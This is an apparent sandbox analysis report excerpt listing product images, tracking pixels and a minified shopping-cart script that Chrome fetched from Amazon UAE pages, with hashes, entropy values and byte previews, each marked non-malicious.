                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4573
                                                                                                                                                                                                                                                                Entropy (8bit):7.796591990824318
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TVjP8rjbJHEVt2WmXtHjqLr/nWMhJqIMSTQKPftLmZ:aLZIXmXFkr/jpm
                                                                                                                                                                                                                                                                MD5:202BCB678C2D1C5FDB579804E8B53D85
                                                                                                                                                                                                                                                                SHA1:3BC616DC7C12F250206EF7E68CC21E1CF540AB1C
                                                                                                                                                                                                                                                                SHA-256:0FD972D9E5078D6CA552E7355AA957C953B9ACCE1D58E3AAF119B7DF6A3ED4A8
                                                                                                                                                                                                                                                                SHA-512:AA7C16F24DC8EF1AEEEB6E9E2DC3F64A263B52DE07E69AC27119B6DD434B8E6F3EF34F31E9C9F1350530E6B0A8182D78F299AEEC4CF849A34F7E2AFAA6710691
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6...................................................................X................]..B...;....=;y.=:y.=:y..z|..z.....'...........3.Vw?W.z..N..".....R...y..N..Q...(Y.W...}m.....9....,.c..s..hh=.a..$.b.l...}.&?g7g1.BV.&'..O...y..[q7...`...p.<`...t.q..J6.4...P.)V...Z......G......k1i..9~..~e.c,b0.H..qi>..........#.c..P[...k.XCQ....e...^..|....-..Z.=..8...2:.....O...W..x......l.i.{~m.....a..+CK.a..M_t..m.o[.P.sV.h[I.8..yjz..l.ik.>..#/(....%.t.......Z...#.5.......[...0......n.-../F&'Qm]=.7.|.......1.F-*Y.>..s.C.....g.U-Lr.Qj....7..K|.V....p.^K].pg...8.......:.k.kh...pHs^.n......qqR..l.....]Y......9.B.9..b....:F8........l&.Ae=.5..k..O...jno..;=........Kc.}...f..Zz..lk....#.-.8...h.....U.Z2....YEK....).R..Xc..E...i.....s..F....Jq..........P.....(...4.O.@...............................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3DjQueryDomReady%26cf0%3D41684%26pc0%3D41684%26ld0%3D41684%26t0%3D1723469044682%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41683
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (550)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12513
                                                                                                                                                                                                                                                                Entropy (8bit):5.434628844075745
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:Q4IPhv98IxQ8I62eZIFxFXwFacRLQl7DFc/WY7//mXDsBRYK:yPhv9txVIje5RLQl7i/visXX
                                                                                                                                                                                                                                                                MD5:47539E88D4690AB67703ABD383E7B3DF
                                                                                                                                                                                                                                                                SHA1:A901C87377138063B884A6ED9173F1CC142A67B5
                                                                                                                                                                                                                                                                SHA-256:6733522B047B40AAC2DA228652E13FFAEDD219D2EB491D2EFF0BA004E7D189C5
                                                                                                                                                                                                                                                                SHA-512:87DE7FED7ABCD7916BC96B26495B47272A2F6B04640C5D79550C990E21694D3ED2544D4DB315E84151A033330D6F65D13206E426960355078E2982D8492A927A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(m){var r=window.AmazonUIPageJS||window.P,w=r._namespace||r.attributeErrors,q=w?w("QuantitySliderAssets",""):r;q.guardFatal?q.guardFatal(m)(q,window):q.execute(function(){m(q,window)})})(function(m,r,w){function q(t,n){try{m.register(t,n)}catch(f){if(-1===f.message.indexOf("reregistered by QuantitySliderAssets"))throw f;}}function y(){var t=arguments;return{register:function(n,f){try{m.when.apply(m,t).register(n,f)}catch(h){if(-1===h.message.indexOf("reregistered by QuantitySliderAssets"))throw h;.}}}}m.when("QuantitySliderAssetDuplicationGuard").execute(function(t){t.when("A","quantity-slider-utils","qs-cart-update-utils").register("qs-cart-update-handler",function(n,f,h){function l(a){p||(p="quantity-slider-widget-"+a);return p}function e(a,b){if(!b.atcFormSubmitDisabled){if((a=a.$target&&a.$target.closest(".qs-atc-form"))&&0!==a.length)return a;m.log("Missing $form object","ERROR",l(b.clientName))}}function b(b,x,k){n.trigger(f.ACTIONS.ADD_TO_CART_SUBMIT_START,{asin:b,cartT
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 194x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):17414
                                                                                                                                                                                                                                                                Entropy (8bit):7.968111501918185
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:QrgLiWN4wdR88FQ6cDEH1ccmKZExte+vxnob/ciYUMDnEKzXCu/:zWBw3BCsHgpAkx0ciYUUEKzXCu/
                                                                                                                                                                                                                                                                MD5:C8F476BEF6CBBFBDC138B29DA324C3AC
                                                                                                                                                                                                                                                                SHA1:BCE1FA947A7942C9AED0C365C43E03D86BDEF87A
                                                                                                                                                                                                                                                                SHA-256:4DC7FB74CEF333899B92FD2F50F7CE5D3DB536BE3A7AC4F750CDB1771BB02CC3
                                                                                                                                                                                                                                                                SHA-512:5BEAACAA02C824BE504FFBABCAEFC41FFEAB08044700C2957010752F310B03631E74F355738F242CFDF1D26B3DC5C4B7063703AF14BA5E484C6917642971941D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..."1A.2Q#Baq..R...$....%3CSTbr..4...DUc......................................................!.1..A."Qq..2a..#B......b.CR.............?.....zr.......2.V..$..>...J...u.\...AL...i.[.-.5..I...g.]..0...t..H.)..#.pQ.e...Z...`9.:....3.....<;Un.t.....9u....._.....}Q<.....W...9(..]{N._.e'_.h.>q.....H.......<.H.q.q.Q.K..})%... 9.^..oaoKs.y.N."...>.C..5VVT._N...wN..i.1..;..AO.HO..3....N....N.......%)u....{.. W.pI....1..`n=}.'R..|9-..E..$.....y|.v..D._..R..c.b/M.A.L..i+q..2~.^..H.U2...]]....7I.0'{."2K1.V G.'..#.bm.Yv.gy-...Y.P.....6...M.#c..W.)..h..@....b.[...>e.. ...U.k.W~....:.....Z.:._R..\.H.x...'IX.C....ky......V.o...&.8|...??._....i.1_q.!..Yd/...0.8.[/r.T&X.......zw.64..{.7P...!T..nu.0l...w..F....f........h......d...v..9^.........h>4
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 155x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3574
                                                                                                                                                                                                                                                                Entropy (8bit):7.8726741886025415
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TflrAM4qvX6DledblJygLp9yrTrux8LQCugqN:VABlCbXygLp98TwhCuPN
                                                                                                                                                                                                                                                                MD5:F7630EA34076A1A203850D7B6F409BBA
                                                                                                                                                                                                                                                                SHA1:4CC1ADE88CB3992EF2F0949EB4B76E5D37673880
                                                                                                                                                                                                                                                                SHA-256:4C1BA6A2FA7C88159C36FA0A18DCE2796E3544ADD8997386C789DCA5CB89A90B
                                                                                                                                                                                                                                                                SHA-512:8641B75ADD3A65354081D275ED7D79E63CFE86DEEDACE92AA01CF8C011118BCE1F49310D4079490D394BB4E76F737FC45ACB7F8F50C899D0FA3514F5AC167081
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71-zL81AiAL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...................................................................!1QRqr......"#%36STUt....25ABa..Es.......$b............................................!.............?....Ta. ..0k...].......Z..U].|"..vKI7'f&..*......*..wU._...-9.M..Enxs..z..|I...'.do...p..O.1.L..R..vD..r..je..V^.....T...V..*y.u.f.o:.[.R......S...V...y.t......s/]x......d.zOx.8.3.W.]G9....u..Q.%./.5...=.R.d.zOx.8.3.W.]G8....5.Q.%./...='.wJN...{.t.q.g.....q/Y!.k}*~q/Yx.........>~_z..8...V.T..^.^......e....._.....}..Qx..][.3..:..5@.pK4Hj..3..D.27...p..*.k.<....(vd.zOz....N..%...wX...C..rx........~f:.g..4...dq...z.=..<....Z~.q..)cr..>...%.u:G-..{..s..F.h.k......nq..,K..t.ZzS....m.KN...........Y\V"P!...I3F.K!H...~|..h..E=..Z..P!..).)...n..;.-...;.2RP.7s.wY-............[7{.?..R.....wY..l3~'t._;...Vv...._.D......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D27642%26at%3D27642%26t%3D1723469122091%26csmtags%3DendVL%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:27642
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:99EW8DTCPK04PDBCDQEK$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D99EW8DTCPK04PDBCDQEK%26ic%3D2%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D5707%26at%3D5707%26t%3D1723469093784%26csmtags%3DstartVL%26pty%3DFreshMerchandisedContent%26spty%3Dlearn-more%26pti%3Dlearn-more%26tid%3D99EW8DTCPK04PDBCDQEK%26aftb%3D1%26lob%3D1:5706
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):23454
                                                                                                                                                                                                                                                                Entropy (8bit):7.960066050617329
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:362XylC7saGwgkGOYIChPIQWFzBUz2jj2KKEqGybtQNL5Vn8XN9HGUx4fjhsizyD:3slCYXwgJOY90jjhKEqGymL5+99TuhjQ
                                                                                                                                                                                                                                                                MD5:D63CD26924F97276B0E35C239A8EF3AA
                                                                                                                                                                                                                                                                SHA1:27CB6AE43751E84805B9F5840DF93BB19E099EDC
                                                                                                                                                                                                                                                                SHA-256:C04CBBE569EA56DC1AB5BF5E0857A0ACFCE9A030E4DB5D4AF42CA4FDFF4C51C8
                                                                                                                                                                                                                                                                SHA-512:22723EA8A6BFCA3842B8A89CC75BF644AAAEB66D7C4F6B9B7128AAF4F2B9A7B38E50E68EA5E15FEE5FD30DF3221F2049854D9CEA4997E51C5B48A7D8A0D0A0CE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronic/kamja/Stores/BudgetStore/2404DR14_3__AE_GW_DC_ElectronicsBudget_379x304._SY304_CB554784697_.jpg
                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky.......=......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:FC03975124CB11EFA30E8F55AA993B0A" xmpMM:InstanceID="xmp.iid:FC03975024CB11EFA30E8F55AA993B0A" xmp:CreatorTool="Adobe Photoshop 2024 Windows"> <xmpMM:DerivedFrom stRef:instanceID="2AD725D48FD3018F515EAE113945F37E" stRef:documentID="2AD725D48FD3018F515EAE113945F37E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2459
                                                                                                                                                                                                                                                                Entropy (8bit):7.773202505765292
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rsVH4QFB7ZGr+aSkce3P7iVAJ1gt0KlMO1VAO/87RTGQT42H6Lp:TDVYeVGr+6OeJ1cr1SegRP4CG
                                                                                                                                                                                                                                                                MD5:9ACFC70C73C81EDF49C053BD561E457E
                                                                                                                                                                                                                                                                SHA1:39FF0ED0EA662B9BD0DF215C03BED98BC0939FDB
                                                                                                                                                                                                                                                                SHA-256:AF51AA74C20F9BA123782B6061B655E2BA41C1B8987FA7A79167DE344859B757
                                                                                                                                                                                                                                                                SHA-512:C6A5FE987DE1387E9F4C286A9D1AD4C0E3E68722E0A2DF6F404E031B4369CFEDC52EB88E806D6541C600C5DA938628C593E1DE17166822A72E4686BC4CF6BB9E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x._SY116_CB659040198_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1"2AQ....3BUaqrs...4Rb...t....5CEc.............................................!"1..............?...D@DD.D@DD.D@DD.D@DD.D@DD.D@DD.E..VB..#...K.....IA..........b..:.Os.R....$..&..v.c....,.`..."y..'...:.Pi....[...o..o..kF.i...CbO....j%.%ff....7k.!.PA..W>f.w#..!UOy...N.,.;NA.._...\.1.....:JIo..{.]L ;.k.A... ""." "/...N........%EC.q......>_..7.|..C!......s.LNj..R....f`O....Q.Y-C...!.H........ .,.j.m.KA[..^B.......G6.l...U]..AS,...2`.......h.n..$q..W..B......7,`;.u....Z`ig*L....6V...h.C./..~.U...3.xV7..Q...p....y5.(.O..J_..$.c'...*..e.d4..f...#......w@.A..i'...(.l..C{N.$a...b..e......%..`...nL..k...A.... a./..:.Tr...w.,-y.U3...C..m....3*$...T../i..~R...c......#..'Q.W.$.>A..rm...:.6.W..ohT5t.../h......K..G.?...............Zu..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 134x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10687
                                                                                                                                                                                                                                                                Entropy (8bit):7.962704409267389
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:xofHQVafPGFWyKYbXrEWZs6yBYsfvKlCVM8Dv2i8TEJxS8Kj6T7CoQUo3m6:6fH73IjTmBvvgCVVW86G23F
                                                                                                                                                                                                                                                                MD5:FD6BBA265806954EF7B84B8E72363AB9
                                                                                                                                                                                                                                                                SHA1:BAEEC64EFED95E18049D4CB9E8774B99210E4FBC
                                                                                                                                                                                                                                                                SHA-256:916ECB03C89512414F0323FF6859F1F9F8594E99DD279A9EC0A313FEAF232B59
                                                                                                                                                                                                                                                                SHA-512:00DF18D4D7ED892A60DC81BCF760017B1520C7442C012D34A774B204E6E92FFF21459D65800C545F3A6F6612BE1FAA8984E318A8AA252E11665E61F4FDA23878
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.."1.AQ.2a3BRqt....#4U....$C...5bcrs.......D.....................................................!1.AQ...23aq..RSr...bs......".#B...............?..x..6..*A,.sIq.86iH.(....$.>..)xJ../\.\C.6i..(.9..$.8K.8.0.........%P.S...B..`J'..\...=..:.R..l.5uyS.7..D9...=L..M...F(..;.P...W...V(..+.-#A+....cp..M.r.`|..''...<.w..m..O.O.O..:+w...Y<....3Av.h..5W./.5W.g...e-,..........#.I....XwBi...0.v.."..U..<._....<._....qaxo.a......,g."..........v.Ao.Rz_/....U.....U.....U...3O.[......F..v...<.6S..C..V..+..s(.r....{:.5l....G.......]...j..U_{..u..j..3.J/...JuqbG.q....(.._c.....<`.}.8....-f...._.....ZB..7 .Svs..G.V>.|..do0.C..[..{.............>iG*.:A....o".?9.h...b=P.O-...k..l~..N'.Z.C.x..y.....7..G..8Y.-..f...o.....^..G.fU\%V..Z....2.[.D.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):14725
                                                                                                                                                                                                                                                                Entropy (8bit):7.9211118496796455
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:l/KZ9eKqHPpZM3FlRjCE585ckBGbf46Nd0Zs8Y9Dy4N88iz7916uajlV:JU9FqRZM1lU/2Vbw6D02vZyX8iX6jV
                                                                                                                                                                                                                                                                MD5:BA5B2C867E848FF273898C57A4670DDD
                                                                                                                                                                                                                                                                SHA1:D1D487FCB608722CBE611C9C863E7C11558D4546
                                                                                                                                                                                                                                                                SHA-256:AEB81ADB299D869B63370993FCF934D381253ECBFAF573833D5BBECFC6C4B2C2
                                                                                                                                                                                                                                                                SHA-512:6D34161AF829C1B7C75875E8F30502DCE912E30EEB82181A7500421E25CB55F708AEB53C1C0F3D394D5B6B24D849D119CCB26B19040287A7F5B077B860DCEBE9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61P62lC5OHL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5.................................................................................7_B.G......................^Y<wN;..J... ...[........P..K..W...6...$jT........^..t.d.......}..4.MA:.........G....w...;.<........r.K..D....9..3...m]%.......>O.O(.Y...T.......P..,vI1..N[...w...........V...[.^s,5Uw-./...]....IQY(....f.Fs..c..{R.......*......J.u....?-i.p.L."..!....w..e.^.>.i..].}h....uG..X..(q..^..x.q....q.6...l.>.b....K...P...........>..,.-..9.o.u6....._.e+MEh5>...[^..L..Z...Xc...#...k,v....v&k[.KPS...a...q...'}S............m.n..?%a..zod...Dms...~.C..a.#.....s.F...!..._..h-.2H..z.A....}Gn+...../.R...........;wT.E.I...F..c..........<3dv.T.o.g..:.CY7....>v=y.E.A..,y......^.r..W......fo.c1(..p.i.8...nkr.#.6..I..QP......j.^K../.._r...=.z^M..~..............B.#.=Vk.{...q....)>!y..%.U
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2215
                                                                                                                                                                                                                                                                Entropy (8bit):7.780080651712038
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r1bmS1J7o9AQuSJ4KkxZjG97evR+z22pbK3PzcGCSdbbbbR:TmDsCQXJUjG97E+FhK3Pz7bbbbR
                                                                                                                                                                                                                                                                MD5:6A20D8C3C1C584CBDBFD7BF6376F07B2
                                                                                                                                                                                                                                                                SHA1:09ED213ED35E8553E1279F920A6BC2878F9010F7
                                                                                                                                                                                                                                                                SHA-256:30DA63A92210E0B20817E57EAF2789A5B4DC9895703298A0083E52799C1B7338
                                                                                                                                                                                                                                                                SHA-512:F735DE0A33BE1DEAD940B2B7A9F734E018D7189325EDD586CFB05603A0B9EB6C4E3132375C3AE29087259A7B7735790D50529F73A23D2FB6C9DCAD14E5E3BF4C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Gaming_1x._SY116_CB659040113_.jpg
